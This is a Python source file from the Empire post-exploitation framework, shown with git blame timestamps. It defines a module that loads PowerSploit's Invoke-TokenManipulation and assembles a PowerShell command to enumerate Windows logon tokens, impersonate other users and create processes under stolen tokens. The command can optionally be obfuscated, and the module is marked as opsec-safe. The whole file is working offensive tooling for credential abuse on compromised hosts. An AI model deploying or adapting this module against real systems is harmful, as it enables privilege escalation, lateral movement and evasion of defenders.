Empire/lib/modules/powershell/credentials/tokens.py

161 lines
6.2 KiB
Python
Raw Normal View History

2015-08-05 18:36:39 +00:00
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-TokenManipulation',
'Author': ['@JosephBialek'],
'Description': ("Runs PowerSploit's Invoke-TokenManipulation to "
"enumerate Logon Tokens available and uses "
"them to create new processes. Similar to "
"Incognito's functionality. Note: if you select "
"ImpersonateUser or CreateProcess, you must specify "
"one of Username, ProcessID, Process, or ThreadId."),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
2015-08-05 18:36:39 +00:00
'OpsecSafe' : True,
2016-09-23 18:04:35 +00:00
'Language' : 'powershell',
'MinLanguageVersion' : '2',
2015-08-05 18:36:39 +00:00
'Comments': [
'http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'RevToSelf' : {
'Description' : 'Switch. Revert to original token.',
'Required' : False,
'Value' : ''
},
'ShowAll' : {
'Description' : 'Switch. Enumerate all tokens.',
'Required' : False,
'Value' : ''
},
'ImpersonateUser' : {
'Description' : 'Switch. Will impersonate an alternate users logon token in the PowerShell thread.',
'Required' : False,
'Value' : ''
},
'CreateProcess' : {
'Description' : 'Specify a process to create instead of impersonating the user.',
'Required' : False,
'Value' : ''
},
'WhoAmI' : {
'Description' : 'Switch. Displays current credentials.',
'Required' : False,
'Value' : ''
},
'Username' : {
'Description' : 'Username to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ProcessID' : {
'Description' : 'ProcessID to impersonate token of.',
'Required' : False,
'Value' : ''
},
'Process' : {
'Description' : 'Process name to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ThreadId' : {
'Description' : 'Thread to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ProcessArgs' : {
'Description' : 'Arguments for a spawned process.',
'Required' : False,
'Value' : ''
},
'NoUI' : {
'Description' : 'Switch. Use if creating a process which doesn\'t need a UI.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
2017-03-11 23:35:17 +00:00
def generate(self, obfuscate=False, obfuscationCommand=""):
2015-08-05 18:36:39 +00:00
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-TokenManipulation.ps1"
2017-03-11 23:35:17 +00:00
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
2015-08-05 18:36:39 +00:00
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
2017-03-11 23:35:17 +00:00
scriptEnd = "Invoke-TokenManipulation"
2015-08-05 18:36:39 +00:00
if self.options['RevToSelf']['Value'].lower() == "true":
2017-03-11 23:35:17 +00:00
scriptEnd += " -RevToSelf"
2015-08-05 18:36:39 +00:00
elif self.options['WhoAmI']['Value'].lower() == "true":
2017-03-11 23:35:17 +00:00
scriptEnd += " -WhoAmI"
2016-03-12 00:31:27 +00:00
elif self.options['ShowAll']['Value'].lower() == "true":
2017-03-11 23:35:17 +00:00
scriptEnd += " -ShowAll | Out-String"
2015-08-05 18:36:39 +00:00
else:
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
2017-03-11 23:35:17 +00:00
scriptEnd += " -" + str(option)
2015-08-05 18:36:39 +00:00
else:
2017-03-11 23:35:17 +00:00
scriptEnd += " -" + str(option) + " " + str(values['Value'])
2015-08-05 18:36:39 +00:00
# try to make the output look nice
if script.endswith("Invoke-TokenManipulation") or script.endswith("-ShowAll"):
2017-03-11 23:35:17 +00:00
scriptEnd += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String"
2015-08-05 18:36:39 +00:00
else:
2017-03-11 23:35:17 +00:00
scriptEnd += "| Out-String"
2015-08-05 18:36:39 +00:00
if self.options['RevToSelf']['Value'].lower() != "true":
2017-03-11 23:35:17 +00:00
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
2017-03-11 23:35:17 +00:00
script += scriptEnd
2015-08-05 18:36:39 +00:00
return script